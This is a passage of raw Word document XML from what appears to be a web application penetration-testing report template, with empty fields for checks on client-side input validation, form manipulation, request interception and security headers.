                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3022" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3758FF2E" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00E10FAB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E10FAB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6C4269B7" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00E10FAB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:hanging="744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E10FAB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CF4CC6" w:rsidRPr="00E10FAB" w14:paraId="2CCA6CDD" w14:textId="77777777" w:rsidTr="00A83C8E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72B2E41D" w14:textId="6732DAAE" w:rsidR="00CF4CC6" w:rsidRPr="00E10FAB" w:rsidRDefault="00CF4CC6" w:rsidP="00A83C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F4CC6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>JavaScript Disabled &amp; Validation Bypassed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09AF5FE8" w14:textId="77777777" w:rsidR="00CF4CC6" w:rsidRPr="002A026C" w:rsidRDefault="009D1994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2A026C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2A026C" w:rsidRPr="002A026C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Observations]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B17BF75" w14:textId="77777777" w:rsidR="002A026C" w:rsidRDefault="002A026C" w:rsidP="00CF4CC6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  <w:p w14:paraId="66372F6B" w14:textId="77777777" w:rsidR="002A026C" w:rsidRDefault="002A026C" w:rsidP="00CF4CC6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  <w:p w14:paraId="3E9D1F66" w14:textId="04F50FA5" w:rsidR="00FC7DCD" w:rsidRPr="00E10FAB" w:rsidRDefault="00FC7DCD" w:rsidP="00CF4CC6">
            <w:pPr>
              <w:spacing w:before="60" w:after="6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EF03B7" w:rsidRPr="00E10FAB" w14:paraId="65355E58" w14:textId="77777777" w:rsidTr="00A83C8E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099B3355" w14:textId="0E62FD24" w:rsidR="00EF03B7" w:rsidRPr="00CF4CC6" w:rsidRDefault="00EF03B7" w:rsidP="00A83C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F03B7">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTML Form Manipulation Attempted?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="060A6884" w14:textId="77777777" w:rsidR="00EF03B7" w:rsidRDefault="00EF03B7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184776" w:rsidRPr="00184776">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Modifications Made: Removing required attributes, changing input types, etc.</w:t>
            </w:r>
            <w:r w:rsidR="00184776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4DE8DB94" w14:textId="77777777" w:rsidR="00184776" w:rsidRDefault="00184776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220CEEE4" w14:textId="62FC68F6" w:rsidR="00184776" w:rsidRPr="002A026C" w:rsidRDefault="00184776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573799" w:rsidRPr="00E10FAB" w14:paraId="7E3DB20B" w14:textId="77777777" w:rsidTr="00A83C8E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0E61007B" w14:textId="538423FA" w:rsidR="00573799" w:rsidRPr="00EF03B7" w:rsidRDefault="00573799" w:rsidP="00A83C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73799">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Direct Invalid Input Submission Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4534F390" w14:textId="77777777" w:rsidR="00573799" w:rsidRDefault="00573799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Pr="00573799">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Accepted/Rejected, Server Response Details</w:t>
            </w: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4B13CB2C" w14:textId="77777777" w:rsidR="00573799" w:rsidRDefault="00573799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140147EB" w14:textId="77777777" w:rsidR="00573799" w:rsidRDefault="00573799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3A5C33D8" w14:textId="45BE42C7" w:rsidR="0046694D" w:rsidRDefault="0046694D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606C02" w:rsidRPr="00E10FAB" w14:paraId="1E3B2E14" w14:textId="77777777" w:rsidTr="00A83C8E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5003019B" w14:textId="53E31C48" w:rsidR="00606C02" w:rsidRPr="00573799" w:rsidRDefault="00606C02" w:rsidP="00A83C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606C02">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Intercepted &amp; Modified Request Payload?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="083FCE60" w14:textId="77777777" w:rsidR="00606C02" w:rsidRDefault="00606C02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Pr="00606C02">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Observations on Server Behavior</w:t>
            </w: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3EF13B0D" w14:textId="77777777" w:rsidR="00606C02" w:rsidRDefault="00606C02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3B29D00F" w14:textId="77777777" w:rsidR="00606C02" w:rsidRDefault="00606C02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1E618515" w14:textId="6BEB7619" w:rsidR="0046694D" w:rsidRDefault="0046694D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1800BC" w:rsidRPr="00E10FAB" w14:paraId="1F36D985" w14:textId="77777777" w:rsidTr="00A83C8E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73EF2EC1" w14:textId="1DD32C64" w:rsidR="001800BC" w:rsidRPr="00606C02" w:rsidRDefault="001800BC" w:rsidP="00A83C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800BC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Tested with Unexpected Characters or Large Inputs?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2CF2878E" w14:textId="77777777" w:rsidR="001800BC" w:rsidRDefault="001800BC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Pr="001800BC">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Any Crashes or Unexpected Behavior?</w:t>
            </w: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18ED5E5C" w14:textId="77777777" w:rsidR="001800BC" w:rsidRDefault="001800BC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2F93473B" w14:textId="77777777" w:rsidR="0046694D" w:rsidRDefault="0046694D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39E19C52" w14:textId="5299FCEB" w:rsidR="001800BC" w:rsidRDefault="001800BC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231394" w:rsidRPr="00E10FAB" w14:paraId="04F7182A" w14:textId="77777777" w:rsidTr="00A83C8E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184F17F8" w14:textId="3045B1FB" w:rsidR="00231394" w:rsidRPr="001800BC" w:rsidRDefault="00231394" w:rsidP="00A83C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31394">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>API Endpoint Tested Without Client-Side Validation?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C084691" w14:textId="77777777" w:rsidR="00231394" w:rsidRDefault="00231394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Pr="00231394">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, Results from Postman/Insomnia Requests</w:t>
            </w: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31FA866F" w14:textId="77777777" w:rsidR="00231394" w:rsidRDefault="00231394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6A99B449" w14:textId="77777777" w:rsidR="0046694D" w:rsidRDefault="0046694D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2D5730C7" w14:textId="0C8CF45C" w:rsidR="00231394" w:rsidRDefault="00231394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9B448B" w:rsidRPr="00E10FAB" w14:paraId="3FFC38EA" w14:textId="77777777" w:rsidTr="00A83C8E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17961BB0" w14:textId="13D0677B" w:rsidR="009B448B" w:rsidRPr="00231394" w:rsidRDefault="009B448B" w:rsidP="00A83C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9B448B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Security Headers Enforced?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B572AED" w14:textId="77777777" w:rsidR="009B448B" w:rsidRDefault="009B448B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9E3579" w:rsidRPr="009E3579">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Yes/No, CSP, X-Frame-Options, etc.</w:t>
            </w:r>
            <w:r w:rsidR="009E3579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6FA0FBC4" w14:textId="77777777" w:rsidR="009E3579" w:rsidRDefault="009E3579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30F8DEAF" w14:textId="77777777" w:rsidR="0046694D" w:rsidRDefault="0046694D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74B0DC31" w14:textId="19345EED" w:rsidR="009E3579" w:rsidRDefault="009E3579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4C554B" w:rsidRPr="00E10FAB" w14:paraId="4266F6E3" w14:textId="77777777" w:rsidTr="00A83C8E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4D835CF2" w14:textId="7B56A928" w:rsidR="004C554B" w:rsidRPr="009B448B" w:rsidRDefault="00A72A6B" w:rsidP="00A83C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72A6B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Server Error Messages Analyzed?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4532BDC1" w14:textId="77777777" w:rsidR="004C554B" w:rsidRDefault="00EE58B6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Pr="00EE58B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Any Indicators of Client-Side Bypass, Sensitive Data Exposure, etc.</w:t>
            </w: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77DC10C1" w14:textId="77777777" w:rsidR="00EE58B6" w:rsidRDefault="00EE58B6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1453615E" w14:textId="77777777" w:rsidR="00EE58B6" w:rsidRDefault="00EE58B6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439190A6" w14:textId="1935BCA5" w:rsidR="0046694D" w:rsidRDefault="0046694D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BA0D21" w:rsidRPr="00E10FAB" w14:paraId="5F8C0F93" w14:textId="77777777" w:rsidTr="00A83C8E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3266AB30" w14:textId="2FB53AA3" w:rsidR="00BA0D21" w:rsidRPr="00A72A6B" w:rsidRDefault="00BA0D21" w:rsidP="00A83C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A0D21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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46CBF1DC" w14:textId="77777777" w:rsidR="00BA0D21" w:rsidRDefault="00BA0D21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1B570B" w:rsidRPr="001B570B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Form Manipulation, API Abuse, XSS Injection, etc.</w:t>
            </w:r>
            <w:r w:rsidR="001B570B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3DD990E6" w14:textId="77777777" w:rsidR="001B570B" w:rsidRDefault="001B570B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223D7CCD" w14:textId="77777777" w:rsidR="001B570B" w:rsidRDefault="001B570B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27C22ED9" w14:textId="73911860" w:rsidR="001B570B" w:rsidRDefault="001B570B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4302AC" w:rsidRPr="00E10FAB" w14:paraId="355A6C16" w14:textId="77777777" w:rsidTr="00A83C8E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557982F7" w14:textId="1FE021B0" w:rsidR="004302AC" w:rsidRPr="00A72A6B" w:rsidRDefault="004302AC" w:rsidP="00A83C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4302AC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6525" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="658E2C20" w14:textId="77777777" w:rsidR="004302AC" w:rsidRDefault="004302AC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162DA363" w14:textId="77777777" w:rsidR="004302AC" w:rsidRDefault="004302AC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45D69BBC" w14:textId="77777777" w:rsidR="004302AC" w:rsidRDefault="004302AC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31A22B0D" w14:textId="77777777" w:rsidR="004302AC" w:rsidRDefault="004302AC" w:rsidP="00CF4CC6">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto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E10FAB" w:rsidRPr="00E10FAB" w14:paraId="43E86B44" w14:textId="77777777" w:rsidTr="00A83C8E">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="552653BD" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00A83C8E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10FAB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3A675154" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="209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8A7CAED" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="209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8209D8B" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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648C739" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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10F947F" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="20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DC0AE37" w14:textId="77777777" w:rsidR="00E10FAB" w:rsidRPr="00E10FAB" w:rsidRDefault="00E10FAB" w:rsidP="00E10FA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12C5CC35" w14:textId="77777777" w:rsidR="00583338" w:rsidRDefault="00583338" w:rsidP="00583338">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4937D855" w14:textId="77777777" w:rsidR="00583338" w:rsidRPr="00B07F1E" w:rsidRDefault="00583338" w:rsidP="00583338">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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3338" w:rsidRPr="005D2C80" w14:paraId="43037188" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E730EDD" w14:textId="77777777" w:rsidR="00583338" w:rsidRPr="005D2C80" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F0E3A42" w14:textId="77777777" w:rsidR="00583338" w:rsidRPr="005D2C80" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7FDDC71F" w14:textId="77777777" w:rsidR="00583338" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A2CE599" w14:textId="77777777" w:rsidR="00583338" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="277109CE" w14:textId="77777777" w:rsidR="00583338" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="19E98EA5" w14:textId="77777777" w:rsidR="00583338" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="301210AE" w14:textId="77777777" w:rsidR="00583338" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4016BAA7" w14:textId="77777777" w:rsidR="00583338" w:rsidRPr="005D2C80" w:rsidRDefault="00583338" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13EFC9C3" w14:textId="77777777" w:rsidR="00B3654E" w:rsidRDefault="00B3654E" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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061C17" w:rsidRPr="00A51A96" w14:paraId="3B861DA0" w14:textId="77777777" w:rsidTr="00962B6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7409EAEB" w14:textId="7855810D" w:rsidR="00061C17" w:rsidRPr="003C713F" w:rsidRDefault="00061C17" w:rsidP="005232C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462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Test 12.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="0046204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B51F55" w:rsidRPr="00B51F55">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test Client-side Controls over User Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="424BDB98" w14:textId="77777777" w:rsidR="00061C17" w:rsidRPr="00E32243" w:rsidRDefault="00061C17" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left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451"/>
        <w:gridCol w:w="3555"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w14:paraId="63E42E0E" w14:textId="77777777" w:rsidTr="006A5BC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116BCA7" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA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0504E9A" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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F60DA" w:rsidRPr="00CF60DA" w14:paraId="2CCFBBBA" w14:textId="77777777" w:rsidTr="006A5BC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3C7AD32" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA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E4C3665" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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F60DA" w:rsidRPr="00CF60DA" w14:paraId="5A1C4A15" w14:textId="77777777" w:rsidTr="006A5BC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8618BCA" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA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13C8739" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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F60DA" w:rsidRPr="00CF60DA" w14:paraId="5F3823F3" w14:textId="77777777" w:rsidTr="006A5BC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A52E033" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA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Type of </w:t>
            </w:r>
            <w:r w:rsidRPr="00CF60DA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Client-Side Controls</w:t>
            </w:r>
            <w:r w:rsidRPr="00CF60DA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Used by Applications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86FAC77" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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F60DA" w:rsidRPr="00CF60DA" w14:paraId="1C13CA57" w14:textId="77777777" w:rsidTr="006A5BC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7C80F80" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Arbitrary Requests Sent to the Server Successful</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="34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1075C65" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA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CF60DA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55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2705FB1" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA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CF60DA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CF60DA" w:rsidRPr="00CF60DA" w14:paraId="203103A3" w14:textId="77777777" w:rsidTr="006A5BC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E46388F" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA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Server Response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6F48E55" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="210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F051831" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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17DC3F3" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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0D32B4D" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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F60DA" w:rsidRPr="00CF60DA" w14:paraId="22DF5000" w14:textId="77777777" w:rsidTr="006A5BC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36555D1" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="006A5BC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F60DA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Exploitable Inputs in the Validation of Client-Side Controls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199DEFC" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="211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70C3BE4" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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B628B92" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60DA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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E912FAF" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00CF60DA" w:rsidP="00CF60D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F60DA" w:rsidRPr="00CF60DA" w14:paraId="3D4D6448" w14:textId="77777777" w:rsidTr="006A5BC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6C0CDA8D" w14:textId="679CA18A" w:rsidR="00CF60DA" w:rsidRPr="00CF60DA" w:rsidRDefault="00FB703A" w:rsidP="006A5BC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B703A">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Bypassed Input Restrictions?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67330D7" w14:textId="77777777" w:rsidR="00CF60DA" w:rsidRPr="005903CA" w:rsidRDefault="00FB703A" w:rsidP="00CF60D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5903C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5903CA" w:rsidRPr="005903C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Methods Used: Modified Maxlength, Readonly, Disabled Properties, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="535930B8" w14:textId="77777777" w:rsidR="005903CA" w:rsidRDefault="005903CA" w:rsidP="00CF60D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BB5ECE1" w14:textId="33E419B9" w:rsidR="005903CA" w:rsidRPr="00CF60DA" w:rsidRDefault="005903CA" w:rsidP="00CF60D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013B6" w:rsidRPr="00CF60DA" w14:paraId="0CF264FF" w14:textId="77777777" w:rsidTr="006A5BC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31B7CCD5" w14:textId="40E0B5CF" w:rsidR="007013B6" w:rsidRPr="00FB703A" w:rsidRDefault="007013B6" w:rsidP="006A5BC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013B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Input Manipulation via Intercepted Requests?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42A3322" w14:textId="77777777" w:rsidR="007013B6" w:rsidRDefault="007013B6" w:rsidP="00CF60D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BF670E" w:rsidRPr="00BF670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Payloads Used, Server Response Behavior</w:t>
            </w:r>
